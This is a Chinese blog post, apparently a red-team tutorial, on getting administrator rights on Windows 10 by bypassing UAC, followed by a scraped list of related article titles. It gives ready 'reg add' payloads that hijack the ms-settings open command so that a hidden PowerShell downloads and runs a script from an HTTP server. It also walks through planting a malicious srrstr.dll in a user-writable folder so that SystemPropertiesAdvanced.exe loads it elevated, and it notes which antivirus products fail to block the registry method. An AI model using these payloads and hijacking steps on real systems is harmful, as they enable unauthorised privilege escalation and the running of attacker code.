当我们拿下一台windows10的低权限用户时,可以尝试进行提权以获得更多的渗透可能性。

注册表修改Bypass UAC:

有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exewusa.exetaskmgr.exemsra.exeeudcedit.exeeventvwr.exe,CompMgmtLauncher.exerundll32.exeexplorer.exe

这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作

利用CompMgmtLauncher.exe提权,该程序在启动时会查询注册表项"Software\classes\mscfile\shell\open\command"(msc后缀文件默认打开方式)、如果存在就会以管理员权限去执行该项默认程序。

提权方式。修改注册表项,更改数据达到权限提升的目的

小知识:regedit 会弹出uac需要用户确认,且容易被杀毒软件拦截。而 reg  相对比较不敏感这个后面再说。

 

payload:

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:30328/')

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:45019/')

Windows Defen : 当我reg 或者regedit执行修改注册表时都会进行拦截。

360安全卫士: 当我安装完360安全卫士的时候,360自动接管windows def reg 执行成功并且没有弹窗 regedit 依旧会弹出弹窗,并且都不拦截(360yyds)

提权成功,尝试创建管理员账户。

Dll劫持bypass UAC:

dll劫持原理:dll (Dynamic Link Library)动态链接库 ,个人认为其实跟linux的os劫持大同小异,在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。

拿网易云的劫持来说, cloudmusic_reporter.exe需要调用libcurl.dll文件,提前把libcurl.dll替换成恶意构造的dll,那么cloudmusic_reporter.exe就会加载恶意构造的dll文件,这就达到了劫持目的。

如Wegame,当我们点击启动时会自动调用需要依赖的.dll文件,这个时候我们把.dll文件构造成恶意payload就会被自动加载,同样我们启动开头讲过的白名单程序时就达到了bypass uac 提权的目的。

dll劫持方法:

(1) DLL替换:用恶意的DLL替换掉合法的DLL

(2) DLL搜索顺序劫持:当应用程序加载DLL的时候,如果没有带指定DLL的路径,那么程序将会以特定的顺序依次在指定的路径下搜索待加载的DLL。通过将恶意DLL放在真实DLL之前的搜索位置,就可以劫持搜索顺序,劫持的目录有时候包括目标应用程序的工作目录。

(3) 虚拟DLL劫持:释放一个恶意的DLL来代替合法应用程序加载的丢失/不存在的DLL

(4) DLL重定向:更改DLL搜索的路径,比如通过编辑%PATH%环境变量或 .exe.manifest/.exe.local文件以将搜索路径定位到包含恶意DLL的地方。

(5) WinSxS DLL替换:将目标DLL相关的WinSxS文件夹中的恶意DLL替换为合法的DLL。此方法通常也被称为DLL侧加载

(6) 相对路径DLL劫持:将合法的应用程序复制(并有选择地重命名)与恶意的DLL一起放入到用户可写的文件夹中。在使用方法上,它与(签名的)二进制代理执行有相似之处。它的一个变体是(有点矛盾地称为)“自带LOLbin”,其中合法的应用程序带有恶意的DLL(而不是从受害者机器上的合法位置复制)。

这里我们使用windows原生软件提权 C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (不存在于win10 及更高)

加载过程:

  • C:\Windows\SysWOW64\srrstr.dll
  • C:\Windows\System\srrstr.dll
  • C:\Windows\srrstr.dll
  • C:\Windows\SysWOW64\wbem\srrstr.dll
  • C:\Windows\SysWOW64\WindowsPowershell\v1.0\srrstr.dll
  • C:\Users<Username>\APPData\Local\Microsoft\WindowsApps\srrstr.dll

在最后它会寻找 C:\Users\<Username>\APPData\Local\Microsoft\WindowsApps\ 这个目录,而这个目录的读写是不需要触发UAC获得管理员权限来操作的。
将Coolis转换成DLL,上传至 C:\Users\<Username>\APPData\Local\Microsoft\WindowsApps\ ,紧接着执行SystemPropertiesAdvanced.exe,它会自动将 srrstr.dll 加载至SystemPropertiesAdvanced.exe进程的内存,同样的,我们也就拥有了管理员权限

构建恶意dll.

将构造好的srrstr.dll放入到windowssapps目录下,再运行SystemPropertiesAdvanced.exe发现提权成功。

红蓝对抗之win10 权限提升相关推荐

  1. 红蓝对抗-红队渗透下的入口权限快速获取

    红队渗透下的入口权限快速获取 文章目录 红队渗透下的入口权限快速获取 前言 红队攻击流程概述 获取入口权限 利用常见组件的漏洞 高危漏洞的检测与攻击 POC的集成与自动化验证 POC bomber 前 ...

  2. 红蓝对抗之Windows内网渗透

    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...

  3. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  4. 不能从远程创建com+对象_红蓝对抗攻防实战:寻找COM对象

    概述 渗透测试人员.红蓝对抗的蓝军(攻击方).恶意行动者经常会选择COM对象来实现横向移动.此前,一些安全研究人员陆续针对COM对象开展研究,包括Matt Nelson(enigma0x3)在2017 ...

  5. 红蓝对抗场景下的二三事

    背景 未知攻焉知防,警察想要抓小偷,就该先摸透小偷的想法,才能更快捷的抓到小偷毕竟小偷抓小偷更容易.网络安全的攻与防,好比"矛"与"盾",要想不被"矛 ...

  6. 红蓝对抗之蓝队防守:ATTCK框架的应用

    企业大规模数字化转型的浪潮下,各类网络入侵事件频发.APT和黑客团伙活动猖獗,合规性驱动的传统安全防护建设已无法满足需求.近年来随着各级红蓝对抗行动的开展,企业安全建设正逐步向实战化转型,而MITRE ...

  7. 红蓝对抗-HW红蓝队基本知识

    第一章 什么是蓝队 蓝队,一般是指网络实战攻防演习中的攻击一方. 蓝队一般会采用针对目标单位的从业人员,以及目标系统所在网络内的软件.硬件设备同时执行多角度.全方位.对抗性的混合式模拟攻击手段:通过技 ...

  8. 红蓝对抗中的攻击思路

    文章目录 前言 1. 大体信息收集 1.1 确定目标 1.2 端口/服务扫描 1.3 漏洞扫描 2. web端人工渗透测试 对目标直接进行web渗透测试 工具 2.1 子域名查询 工具 如果还是找不到 ...

  9. 红蓝对抗闭环操作流程简单梳理和介绍

    红蓝对抗的操作流程闭环: 确定目标 -> 收集数据 ->过程分析 ->构建场景 -> 模拟威胁 -> 调查攻击 -> 评估表现 在网络犯罪分子不断更新网络攻击技术和 ...

  10. 第80天-红蓝对抗-AWD 模式准备攻防监控批量

    思维导图 何为AWD 比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以 进行得分,修复漏洞可以避免被其他队伍攻击失分. 一般分配Web服务器,服务器(多数为Linux) 某 ...

最新文章

  1. 就在几天前,听说用了 YYYY-MM-dd 的程序员,都在加班改 Bug !
  2. Android Studio 打包、生成jks密钥、签名Apk、多渠道打包
  3. 创建oracle dblink权限不足,Oracle-存储过程-创建sequence的时候报权限不足
  4. 20个最强的基于浏览器的在线代码编辑器 - OPEN资讯
  5. 第二周CoreiDRAW总结
  6. python回车键绑定按钮_python tkinter 绑定回车键
  7. jms消息模式和区别_JMS管理对象和JMS消息
  8. 万能Ghost全攻略(最详细完整的教程)
  9. TYVJ1613 不和谐的公司
  10. NLPCC 2022 投稿开始啦~
  11. c语言怎么设计程序框图,C语言课程设计————写下流程图! 谢谢
  12. 黑马程序员——三天快速入门python机器学习(总结篇)
  13. 重新理解泰勒公式 牛顿法
  14. 知识库管理-运维管理
  15. 苹果上网本报价_买水果“送”水泥?无良商家昧良心!苹果纸箱灌水泥,商户坦言:“赚箱子钱”|水泥|水果箱|水泥浆|水果...
  16. 哔哩哔哩自动播放视频
  17. java exchange 日历_如何通过EWS-API 获取所有会议室的日历信息
  18. 一个大龄女程序员的悲哀....
  19. MySQL数据库常见报错案例与错误代码说明
  20. RC复位电路上二极管的作用

热门文章

  1. Ubuntu20.04、22.04安装nvidia显卡驱动
  2. ArcGIS_重分类
  3. 数据库课程设计—超市零售信息管理系统(Python实现)
  4. 存储器容量大小和芯片选择
  5. 超星高级语言程序设计实验作业 (实验02 分支与循环程序设计)(三)
  6. 2020年了,居然还有人在用asp
  7. python监控网页数据_python实现批量监控网站详解及实例
  8. verlay虚拟化技术_Overlay解决虚拟化难题 - 节点动态 - 海南师范大学信息网络与数据中心| Network Center HaiNan Normal University...
  9. 将.fla转换为视频文件(.mp4)或gif文件
  10. 计算机怎么硬盘重做系统,怎么为双硬盘的电脑重装系统